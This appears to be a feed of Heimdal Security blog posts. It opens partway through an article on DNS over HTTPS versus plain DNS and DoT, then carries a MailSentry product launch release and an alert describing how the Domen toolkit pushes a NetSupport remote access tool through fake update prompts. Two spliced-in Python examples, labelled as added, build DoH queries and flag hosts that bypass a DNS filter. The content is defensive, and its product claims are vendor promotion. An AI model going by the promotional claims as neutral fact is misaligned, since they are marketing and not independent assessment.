On-path man-in-the-middle attacks against name resolution become far less useful once DoH is enabled: the DNS requests are encrypted, so a third-party observer can neither make sense of the data they would glean nor silently rewrite the answers. The caveat is that the DoH resolver itself still sees every query, so the choice of resolver becomes a trust decision, and the destination IP address and TLS server name of the connection that follows the lookup can still reveal where the client is going.

Without that encryption (plain DNS), it is easy for a malicious observer to see which domains you are trying to reach. With DoH, those lookups are encrypted and hidden within the enormous volume of HTTPS traffic crossing the network.

Between plain DNS and DoH, then, there is no real contest: DoH is clearly the superior protocol. It is only a matter of time until everyone adopts it in one form or another, even if the road is bumpy for a while.

B. DNS over HTTPS vs. DNS over TLS

I think we’ve cleared up by now what is DNS over HTTPS (DoH).

DNS over TLS (DoT) is regarded by some as more or less the same thing as DoH, but that is not accurate. It is true that both achieve the same result: encrypting DNS traffic between the client and the resolver.

The difference lies in the transport, and in who can see that encrypted DNS is in use at all. DoT runs on its own dedicated port, so a network administrator can at least tell that DoT is being used (and block it if policy requires), even though the content is encrypted. DoH rides on port 443 together with all other HTTPS traffic, so it is much harder to distinguish DNS lookups from ordinary web browsing.

Supporters of DoT argue that it is a better fit for human rights concerns in problematic countries. At the same time, where freedom of speech is limited, the main effect of DoT's dedicated port may be to draw attention: an authoritarian regime can spot (and may look unfavourably upon) DoT users far more easily than DoH users, whose lookups blend in with HTTPS.

The technical difference, then, is the port. DNS over TLS has its own dedicated TLS port, port 853. DNS over HTTPS uses port 443, the standard port for all HTTPS traffic, which is why it blends in so well and why blocking DoH by port alone would mean blocking the web.
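To make the definition concrete, here is what a DoH exchange looks like at the byte level, as an added example that is not part of the original post: it builds a wire-format DNS query, wraps it the two ways RFC 8484 allows (a GET with a base64url-encoded dns= parameter, or a POST whose body is typed application/dns-message), and parses a resolver reply. The reply is constructed locally so the code runs offline; the endpoint https://doh.example.net/dns-query is a placeholder and 93.184.216.34 is only sample data. The TLS layer that gives DoH its privacy is the ordinary HTTPS client's job and is not reimplemented here.

```python
"""RFC 8484 DoH request construction and response parsing, fully offline.
Added example; not code from the original article or from any browser."""
import base64
import struct
from typing import Dict, List, Tuple

QTYPE_A = 1


def build_query(name: str, qtype: int = QTYPE_A, txid: int = 0) -> bytes:
    """Wire-format DNS query (RFC 1035). RFC 8484 recommends ID 0 so that
    identical GET requests are cache-friendly."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD=1; one question
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)        # QCLASS IN


def doh_get_url(endpoint: str, query: bytes) -> str:
    """RFC 8484 GET form: ?dns=<base64url of the wire message, padding stripped>."""
    encoded = base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")
    return f"{endpoint}?dns={encoded}"


def decode_dns_param(value: str) -> bytes:
    """Inverse of doh_get_url (what the server does): restore padding, decode."""
    return base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))


def doh_post_request(query: bytes) -> Dict[str, object]:
    """RFC 8484 POST form: the raw message is the body, typed application/dns-message."""
    return {"method": "POST",
            "headers": {"Content-Type": "application/dns-message",
                        "Accept": "application/dns-message"},
            "body": query}


def _read_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Read a possibly compressed name; return it and the offset just after it."""
    labels: List[str] = []
    end = None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                        # compression pointer (RFC 1035 4.1.4)
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if end is None:
                end = off + 2                            # the first pointer ends the name on the wire
            off = ptr
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (off if end is None else end)


def parse_response(msg: bytes) -> Dict[str, object]:
    """Decode the header and answer section; A records are rendered as dotted quads."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000:
        raise ValueError("QR bit not set: this is a query, not a response")
    off = 12
    for _ in range(qd):                                   # skip the echoed question(s)
        _, off = _read_name(msg, off)
        off += 4                                          # QTYPE + QCLASS
    answers = []
    for _ in range(an):
        name, off = _read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        raw = msg[off:off + rdlen]
        off += rdlen
        rdata = ".".join(str(b) for b in raw) if rtype == QTYPE_A and rdlen == 4 else raw
        answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "rcode": flags & 0x000F, "answers": answers}


def build_a_response(query: bytes, ip: str, ttl: int = 300) -> bytes:
    """Constructed resolver reply used to exercise the parser offline: echoes the
    question and answers with one A record whose owner name is a compression
    pointer back to the question name at offset 12."""
    txid, _flags, qd, _an, _ns, _ar = struct.unpack("!HHHHHH", query[:12])
    header = struct.pack("!HHHHHH", txid, 0x8180, qd, 1, 0, 0)   # QR=1 RD=1 RA=1, NOERROR
    rr = (b"\xC0\x0C" + struct.pack("!HHIH", QTYPE_A, 1, ttl, 4)
          + bytes(int(octet) for octet in ip.split(".")))
    return header + query[12:] + rr


if __name__ == "__main__":
    q = build_query("example.com")
    print(doh_get_url("https://doh.example.net/dns-query", q))   # placeholder endpoint
    print(parse_response(build_a_response(q, "93.184.216.34")))  # sample data only
```

Two details matter in practice. The GET form is what makes DoH cacheable by ordinary HTTP caches, which is why the ID is zeroed; and the only thing distinguishing this request from any other HTTPS request on port 443 is the Content-Type/Accept header and the URL path, both of which are inside the TLS tunnel, which is exactly the visibility problem discussed in the sections that follow.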

How Chrome and Mozilla Are Going to Implement DNS over HTTPS (DoH)

Both Google (Chrome) and Mozilla (Firefox) have announced that they plan to enable DNS over HTTPS by default in future builds.

A. How Chrome will include DNS over HTTPS:

For now, the Chrome team is experimenting with the new DoH protocol only for a limited number of users. This trial period will help them fix any potential issues and figure out how to then deploy DoH for everyone.

The DNS over HTTPS protocol will be tested starting with Chrome 78, which has not launched yet. You can also opt in to the experiment if you would like to be among the users who get DoH in advance.

You can use the Chrome flag chrome://flags/#dns-over-https to switch the DNS over HTTPS experiment on or off once Chrome 78 is live. Note that in this first phase Chrome only upgrades to DoH when the resolver already configured on the system is one of the providers on Google's list that also offers a DoH service; it does not change which resolver you use.

The only downside is that DoH is still relatively hard to configure manually in Chrome, at least for inexperienced users.

B. How Mozilla will include DNS over HTTPS:

To their credit, Mozilla has been working on DoH in Firefox for longer than Google has in Chrome, and it shows. Enabling DoH in Firefox is already easy even for non-technical users (tick "Enable DNS over HTTPS" in the browser's Network Settings dialog), and the settings have a much more developed interface.

For now it is opt-in, as mentioned above, but Mozilla has announced that it plans to make DoH the default in future browser versions as well.

How DNS Traffic Filtering Solutions Need to Adapt to HTTPS

As most organizations are already aware, a DNS traffic filtering solution is a crucial layer of their cybersecurity environment. But while most organizations already use a DNS traffic filter, the dilemma that DoH brings is that compatibility issues may arise once browsers start using DoH by default.

In layman's terms, the problem is this. DNS traffic filtering solutions work by handling the DNS queries that applications send through the operating system's configured resolver, on the standard DNS port (53). If the browser (Chrome or Firefox) stops using the OS resolver and instead sends its queries over DoH (port 443) to a resolver of its own choosing, the traffic filtering solution no longer sees those queries at all. (Firefox additionally checks a canary domain, use-application-dns.net, and keeps DoH off when the network's resolver answers NXDOMAIN for it, which gives administrators a documented way to signal that local DNS policy should be respected.)

This has an upside and a downside. On the upside, the browser's built-in DoH takes over some of the privacy benefit that DNS traffic filters provided until now. That is good news for those who have not yet adopted a DNS traffic filter, but they should be warned that DoH alone is not a security control: it hides lookups from eavesdroppers, it does not block malicious domains.

On the downside, when the browser's DNS answers are wrong (or deliberately manipulated by a malicious third party, or simply point at a known-bad domain), a DNS traffic filter that cannot see the query has no chance to catch it.

This is why, when choosing a DNS traffic filter provider, you need to make sure they support DNS over HTTPS correctly. Our Thor Foresight Enterprise solution is currently developing a solid DoH integration.
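The visibility gap can be shown in a few lines. As an added example, not part of the original post or of any Heimdal product: a classifier over constructed connection records that shows what a perimeter sensor can and cannot tell apart once a browser stops using the OS resolver. The corporate resolver address (10.0.0.53) and the list of public DoH server names are assumptions for the example; the point it makes is that DoT is recognisable by its port, DoH to a known resolver only by the TLS server name (SNI), and DoH to an unlisted resolver not at all.

```python
"""Which name-resolution flows a DNS filter at the perimeter can still see.
Added example with constructed flow records; not code from the original post."""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Assumed for this example: the internal resolver(s) your DNS filter sits in front of.
CORPORATE_RESOLVERS = {"10.0.0.53"}
# Illustrative public DoH endpoints. The TLS server name (SNI) is still sent in the
# clear in today's handshakes, so these names can be matched on the wire.
KNOWN_DOH_SNI = {"dns.google", "cloudflare-dns.com", "mozilla.cloudflare-dns.com"}

BYPASS_CLASSES = {"dns_bypassing_corporate_resolver",
                  "dot_encrypted_dns",
                  "doh_to_known_public_resolver"}


@dataclass
class Flow:
    src: str
    dst: str
    dst_port: int
    proto: str                   # "udp" or "tcp"
    sni: Optional[str] = None    # TLS server name, when the flow is TLS


def classify(flow: Flow) -> str:
    """Label one flow by what a port/SNI-aware sensor can infer about it."""
    if flow.dst_port == 53:
        if flow.dst in CORPORATE_RESOLVERS:
            return "dns_via_corporate_resolver"       # the filter sees and can act on this
        return "dns_bypassing_corporate_resolver"     # plain DNS straight to an outside resolver
    if flow.dst_port == 853:
        return "dot_encrypted_dns"                    # content hidden, but the port gives it away
    if flow.dst_port == 443 and flow.sni in KNOWN_DOH_SNI:
        return "doh_to_known_public_resolver"         # identifiable only by server name
    return "other"                                    # DoH to an unlisted resolver lands here


def report(flows: List[Flow]) -> Dict[str, object]:
    """Count flow classes and list source hosts whose lookups evade the DNS filter."""
    labelled = [(f, classify(f)) for f in flows]
    counts = Counter(label for _, label in labelled)
    bypassing = sorted({f.src for f, label in labelled if label in BYPASS_CLASSES})
    return {"counts": dict(counts), "hosts_bypassing_filter": bypassing}


# Constructed records: one well-behaved host, three kinds of bypass, and one host
# that mixes DoH with normal resolver use.
SAMPLE_FLOWS = [
    Flow("10.0.1.10", "10.0.0.53", 53, "udp"),
    Flow("10.0.1.10", "93.184.216.34", 443, "tcp", sni="example.com"),
    Flow("10.0.1.11", "8.8.8.8", 53, "udp"),
    Flow("10.0.1.12", "1.1.1.1", 853, "tcp"),
    Flow("10.0.1.13", "104.16.248.249", 443, "tcp", sni="mozilla.cloudflare-dns.com"),
    Flow("10.0.1.13", "10.0.0.53", 53, "udp"),
]

if __name__ == "__main__":
    print(report(SAMPLE_FLOWS))
```

Three practical consequences follow from the classifier: plain DNS to outside resolvers and DoT can be blocked by port at the firewall; DoH to well-known resolvers can be blocked by server name, but only until encrypted SNI is deployed; and a browser pointed at an obscure DoH server is indistinguishable from any other HTTPS session, which is why the filter has to cooperate with the browser (or sit on the endpoint) rather than rely on watching port 53.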

How to Implement DNS over HTTPS Correctly in Your Organization

Because DoH encrypts DNS traffic that has historically travelled in the clear, it can bring more privacy and better security to users and organizations alike.

But because the DoH protocol is still new, some organizations are anxious about adopting it, due to compatibility and implementation issues. Here’s what you need to know in order to ensure a smooth transition to DNS over HTTPS.

Pros to Early Adoption of DNS over HTTPS (DoH):

  • You get to test out how DoH will integrate with your networks ahead of time and fix any potential issues before the DoH protocol becomes default;
  • If implemented right, you can gain more data security and better privacy across your organization;
  • You get to test out the compatibility of DNS over HTTPS with your DNS traffic filter;
  • Your feedback may help all software parties involved better their products, to your benefit.

Cons to Early Adoption of DNS over HTTPS:

  • If your system admins are not experienced with DoH and similar protocols, this can end up in blocked queries, false-positive security alerts and so on;
  • If your DNS traffic filtering solution has not been integrated with DoH, DoH can render it ineffective.

How We Cover DoH within Thor Foresight Enterprise

For the moment, our Thor Foresight Enterprise product (which includes DarkLayer Guard, our DNS traffic filtering solution) works around the DNS over HTTPS that browsers will implement.

While we still rely on the DNS settings of the operating system, we supplement them with the queries coming from the browser. Since browser DoH is still in testing, browsers fall back to the OS resolver whenever the DoH lookup fails, and that fallback query is where our solution comes in.

On the long(er) run, we are working to fully integrate the DoH protocol with DarkLayer Guard in a way which will help every party involved develop stronger cybersecurity and cyber resilience.

Wrapping up

Like any IT innovation, DNS over HTTPS can pose a few challenges at first, until everyone gets aligned with it. But once DoH becomes the standard, the benefits of it will greatly outweigh the difficulties it poses in the beginning.

The post Enabling DNS over HTTPS (DoH): Advantages and Best Practices appeared first on Heimdal Security Blog.

Heimdal™ Security Launches MailSentry™, the Solution against Business Email Compromise (BEC)

When advances in cybersecurity made hacking a more expensive illegal pursuit, would-be digital thieves switched more and more to social engineering. As long as they could get insiders to trust them, they could make off with company assets more easily than by fighting the built-in cyber defences. That is why Business Email Compromise (BEC) attacks have risen so much over the past few years.

Almost every month brings more news of successful BEC scams. Public institutions, such as city administrations and hospitals, are targeted most often, but businesses also make ripe targets. On average, a successful BEC scam costs a company around $59,000 per incident, and from July 2016 to July 2019 the total losses caused by BEC scams surpassed $26 billion, according to the FBI's data.

To answer the need for extra defences against BEC attacks, Heimdal™ Security launches MailSentry™. MailSentry™ is a cybersecurity module designed to identify and prevent email fraud. Beyond the simple protection you can get from a spam filter, this new product will allow businesses everywhere to escape the paralysis of multi-person approvals and double-checks.

Morten Kjaersgaard, CEO Heimdal Security details:

“MailSentry™ will, at last, be able to secure the final frontier of cyberattacks: fraud which relies on human trust. Businesses can now no longer be preyed on by ruthless imposters or waste valuable time in double-checking and questioning every seemingly legitimate request. With our new MailSentry™ product, we expect to lead the market for all mail fraud technologies. From now on, you can prevent CEO fraud and business email compromise in a single blow dealt to hackers.”

How Will MailSentry™ Work?

MailSentry™ is a specialized add-on to any spam filter already in place. It combines over 125 detection vectors to identify fraud attempts and flag them properly. By pairing email signature scans with content scans that detect changed IBAN codes and similar tampering, it is designed so that no suspicious detail passes unnoticed.

The new MailSentry™ product will be available as part of a personalized Enterprise suite, or as a stand-alone module. With its complex network of vectors, the BEC protection cybersecurity product will automatically detect:

  • Business Email Compromise (BEC)
  • Email-deployed Malware
  • Phishing and Spear Phishing
  • Imposter Threats (Modified Invoices)
  • CEO Fraud and Criminal Impersonation
  • Man-in-the-email and Spoofing Attacks
  • Malicious content in historical emails


With MailSentry™ your business will also receive live monitoring 24/7 by a team specialized in BEC fraud defense. This way, you can detect malicious intent in due time and prevent any costly mistakes.

Raising employee awareness about scams and Business Email Compromise (BEC) is always a good idea, but businesses shouldn’t rely on it. MailSentry™ and its automatic scan vectors will help where human vigilance fails so that scammers won’t stand a chance.

At the same time, its intelligence will be aided by the expertise of the 24/7 specialist team on-call for analyzing suspicious emails. With MailSentry™, you can stand out from your competition by harnessing the capability of innovative technology, coupled with human ingeniousness.

You can read more about MailSentry™ and schedule a free demo HERE.

Note: MailSentry™ will be live and ready to deploy on 31st October 2019.

About Heimdal Security: Heimdal Security is an emerging cybersecurity company, founded in 2014 in Copenhagen by winners of the world ethical hacking competition Defcon CTF. Since then, the company has grown spectacularly, earning awards for both its proactive security suite (Anti-Malware Solution of the Year in 2018) and for its blog, providing intelligence to security outlets worldwide (Most Educational Security Blog in 2016).

The post Heimdal™ Security Launches MailSentry™, the Solution against Business Email Compromise (BEC) appeared first on Heimdal Security Blog.

SECURITY ALERT: New Domen Toolkit Pushes Malware through Fake Software Updates

A new toolkit has emerged in the past few days, infecting users through compromised websites.

Most of the compromised websites unknowingly hosting the toolkit run WordPress, whose popularity and frequently unpatched installations make it a common target for this kind of injection.

The toolkit has been dubbed Domen and abuses users' trust in a classic social engineering move. Relying on the fact that most users know updates are necessary, the toolkit's creators are piggybacking on the trustworthiness of the programs they claim to represent.

When one sees a notification for a required update from a software brand they already have and trust, chances are they will approve without thinking twice. That’s how the Domen toolkit spreads and infects hosts, allowing hackers to access the infected devices remotely, to take screenshots, steal data and more.

The Domen toolkit was first discovered by security researcher Jérôme Segura, and further reported on by security researcher mol69.

How Does the Domen Toolkit Work?

The Domen Toolkit targets both PC and mobile users. So far, security researchers have discovered Domen messages being delivered in as many as 30 different languages. Besides the linguistic variety, the Domen toolkit is also remarkable in its high level of customization and sophistication.

Because of its complexity, the toolkit is able to adapt to various browsers, operating systems, clients and so on. This is what makes Domen more dangerous than the usual run-of-the-mill exploit kits abusing Flash vulnerabilities.

After an internet user visits a website infected with the Domen toolkit, they will start seeing pop-ups prompting them to install a ‘required’ software update. Those software update messages are delivered with regards to multiple software names and in 30 languages so far.

For example, here is a screenshot of a fake Chrome update prompt.

screenshot of fake chrome update notification

Screenshot courtesy of Bleeping Computer.

Once you click the button to accept the "update", a file named download.hta is downloaded to your device.

When executed, that file downloads a client-side remote access tool (template.js) and writes it to %Temp%\jscheck.exe. Unlike other toolkits, Domen lets this stage be customised heavily: the attacker running the campaign can choose whatever malware payload they wish to deliver after the initial infection, so not all victims end up with the same malware strains after falling for the fake update prompt.

The remote access tool dropped by download.hta is installed and started automatically after infection. If you are infected, you can spot it in your list of running processes under the name NetSupport Manager, as in the screenshot below. Note that NetSupport Manager is a legitimate commercial remote administration product; its presence is a red flag when you or your IT department did not install it.

screenshot of remote access malware in list of processes

Screenshot courtesy of Bleeping Computer.

However, if you got infected on a mobile device, doing this quick check might not be as easy.

The good news is that if your device is protected by a strong next-gen antivirus and a DNS traffic filter, the NetSupport Manager client should not pass undetected: your security suite should alert you that something is wrong.

Unfortunately, the Domen toolkit installs other things besides NetSupport Manager. It is up to the attacker running the campaign to choose which malware payload is delivered and installed, so what you get is a bit of a wildcard.

How to detect the Domen Toolkit and How to Stay Safe

As mentioned above, a quick way to determine whether your computer has been infected by the Domen toolkit is to run a process check. If the NetSupport Manager tool appears in the list of running processes and nobody in your organization installed it, you are infected.

Depending on the stage of the infection, you might notice other signs that something is wrong. The signs that your computer is infected with malware are numerous and can differ depending on the exact malware you are infected with.

By and large, though, any sudden change, evidence of someone using your computer remotely, any apps or software you don’t remember installing, your browser homepage changing – all these are signs of a malware infection.

A good cybersecurity suite should help you get rid of the infections quickly, but by then the damage might already be done. If hackers used the infection to compromise your data or steal accounts, it could prove difficult to put a lid on it. As always, prevention is the best cure.

To make sure you don't fall for the Domen toolkit or similar fake notifications, why not install an automatic software updater such as our Thor Free?

Get Thor Free

The Thor Free tool is free to use forever and it closes the vulnerabilities that come from outdated software: whenever an update is available for one of your installed programs or apps, Thor Free applies the patch automatically. It works silently in the background, without prompting for permissions or restarts every time.

This way, even if you are targeted by messages like the ones the Domen toolkit uses, you will have no reason to believe they are legitimate, because a trusted tool is already handling all your updates. Genuine software updates never arrive as a pop-up on an unrelated website.

Good luck and stay safe.

P.S.: If you already have an active Thor Foresight Home or Thor Premium Home license, you already benefit from the Thor Free functionality, so there is no need to install the automatic software updater separately.

The post SECURITY ALERT: New Domen Toolkit Pushes Malware through Fake Software Updates appeared first on Heimdal Security Blog.